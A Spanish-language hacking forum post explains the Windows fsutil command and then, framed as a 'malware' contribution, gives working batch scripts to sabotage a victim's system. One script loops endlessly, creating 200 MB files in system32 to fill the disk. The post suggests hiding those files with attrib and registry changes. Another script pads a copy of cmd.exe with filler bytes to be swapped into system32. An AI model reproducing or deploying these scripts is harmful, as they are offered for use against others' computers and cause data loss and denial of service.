[Aporte by 4ng3r] Fsutil con Aplicacion en Malware by 4ng3r

Iniciado por AFelipeTrujillo, 23 Febrero 2010, 17:17 PM

0 Miembros y 1 Visitante están viendo este tema.

AFelipeTrujillo

Hola gente, hoy les voy a presentar un comando bastante raro muy poco conocido es el Fsutil, primero la definición, sus parametros y después la aplicación

FSUTIL (FileSUTILities), es una herramienta para la consola de comandos, la cual nos permitira hacer gran variedad de tareas sobre los sistemas de archivos de la familia de sistemas operativos de windows (FAT) y NTFS, como administrar puntos de análisis, administrar archivos dispersos o desmontar un volumen.
Para lanzarlo, deberemos tener las credenciales de administrador !!! este es el problema.

En la siguiente lista podremos ver los diferentes argumentos que le podemos dar a esta herramienta y los diferentes usos que tiene.
Recalcar el uso de fsutil hardlink create, el cual nos servirá para realizar accesos directos duros a ficheros de manera que podamos usar el mismo fichero en diferentes localizaciones y con diferentes nombres pero sin duplicarlo, de manera que cuando se modifica uno, se modifican para las dos ubicaciones ya que es el mismo fichero.

Fsutil behavior

Consulta, cambia, habilita o deshabilita la configuración para generar nombres de archivo con longitud de caracteres 8.3, aceptar caracteres extendidos en los nombres de archivo con longitud de caracteres 8.3 en volúmenes NTFS, actualizar la marca de fecha y hora de último acceso en volúmenes NTFS, la frecuencia con la que se escriben sucesos de cuota en el registro de sistema, los niveles de caché interna de memoria de grupo NTFS paginada y no paginada, y la cantidad de espacio de disco reservado para la zona MFT1.

Fsutil dirty

Nos servirá para saber si se ha establecido el bit de daños del un volumen, y nos permite también establecerlo, de manera que en el siguiente reinicio, autochk buscará automáticamente los errores en el volumen.

Fsutil file

Tiene distintos parámetros:


  • findbysid - Buscar fichero por nombre de usuario, (en caso de estar habilitadas las cuotas de disco).Busca dentro de la tabla maestra de archivos (MFT) de NTFS por lo que el rendimiento es mucho mayor que realizar la búsqueda por la extructura de directorios.
Código (dos) [Seleccionar]
fsutil file findbysid user c:\

  • queryallocranges - Consulta los intervalos asignados de un archivo.Es útil para determinar si un archivo tiene zonas dispersa.
Código (dos) [Seleccionar]
fsutil file queryallocranges offset=1024 length=64 c:\archivo.txt

  • setshortname - Establece el nombre corto (nombre de archivo con longitud de caracteres 8.3) de un archivo en un volumen NTFS.
  • setvaliddata - Establece la longitud de datos válidos
  • setzerodata - Establece los datos cero para un archivo.
  • createnew - Crea un fichero con tamaño especifico (contenido 0)
  • Fsutil fsinfo

    • drives - Enumera todas las unidades.
    • drivetype - Consulta el tipo de unidad.
    • volumeninfo - Consulta la información del volumen.
    • ntfsinfo – Consulta la información de volumen específica de NTFS.
    • statistics – Consulta las estadísticas del sistema de archivos.

Estos son los comandos mas importantes según mi parecer, la idea es seguir con la aplicación de este comando en algún malware que se les ocurra. Si se fijan bien el comandos Fsutil file createnew, sirve para crear un archivo de longitud 0 (cero) pero esto no estan cierto; este comando a demas de crear un archivo puede modificar su tamaño según este Script:

Código (dos) [Seleccionar]
@echo off
echo "Ecriba el Nombre del Archivo"
set /p nom=
echo "Ecriba el tamanno de %nom% en megabyte"
set /p var=
set /a length= %var%*1000000
:: ~~~~~~ RUTINA FSUTIL ~~~~~~~~
fsutil file createnew %nom%.txt %length%
pause


Se imagina esto:

Código (dos) [Seleccionar]
fsutil file createnew fhaker.txt 99999999999999

Es aquí donde podemos observarla potencia de este comando, poder crear archivos con la longitud que queramos en bytes es bastante útil a la hora de sabotear un sistema de información. La desventaja de este comando es que un usuario con experiencia pondría en la labor ponerse a buscar archivo por archivo y lo borraría muy fácilmente este archivo; una solución a este inconveniente es crear varios archivos y distribuirlos por todo el sistema, buena idea pero existe otro problema «no conocemos el tamaño del disco del usuario !!!" . Asi que llenar el disco con uno o cuatro archivo sno es viable lo mejor es llenarlo con miles de archivos, yo propongo esta solución:

Código (dos) [Seleccionar]
@echo off
REM NO INTENTEN ESTO EN SU PC
REM Vamo a crear archivos a punta de numeros
REM Randomicos, como putas!! con %RANDOM%
REM y cada nuero seria un archivo txt de 200 Mb
REm Esto ira en un ciclo infinito
title +++ 4ng3r Malware Fsutil +++
:start
REM Esto nos lleva a la carpeta del catalogo
REM del Sistema Opertativo en muchos casos
REm c:\windows
cd %windir%\system32
set /a length= 200*1000000
fsutil file createnew %random%.txt %length%
goto start


Este se puede potenciar mas aun con el comando at, attrib y cierto .REG para cambiar el Hidden"=dword:00000001 ( ;D) de registro. La idea es ocultar el archivo por que nos dejaría en desventaja con el usuario la funcionalidad de nuestro malware fracasaría y simplemente nos quedaría de lección, pero se me ha ocurrido una idea aun mas loca y destructivo; no se si se estaran pensado en sobre escribir un archivo ???.... si es asi esa es la solución final a nuestro problema, simplemente buscamos un archivo vital para el sistema y le metemos peso a esa monda, entonces el usuario borrara el archivo por ahorrarse algunos bytes en su pc. Esta es la aplicación final que doy para este tema:

Código (dos) [Seleccionar]
@echo off
REM Copiamos CMD.EXE de system32 y lo pasamos a el
REM disco donde esta instalado Windows
copy %windir%\system32\cmd.exe %homedrive%\cmd1.exe
REm Si vamos, ejecutamos y observamos el rendimiento
REM de CMD1.EXE no ha cambiado del original trabaja igual
cd %homedrive%
REM Creamos el archivo
fsutil file createnew ang3cmd.exe 1000000
REM Y hacemos una parametrización de bytes
type cmd1.exe > cmd2.exe
type ang3rcmd.exe >> cmd2.exe
cls
echo "Se termino el Proceso"
pause > nul


Miremos el resultado:


Observemos que cmd1.exe es una copia de cmd.exe (el original) y en la parte de abajo vemos el cmd2.exe ya modificado por el malware, si ejecutamos cmd2.exe fuanciona como debe  ser simplemente re-nombrelo y lo copian a %systemroot%\system32.


FUENTE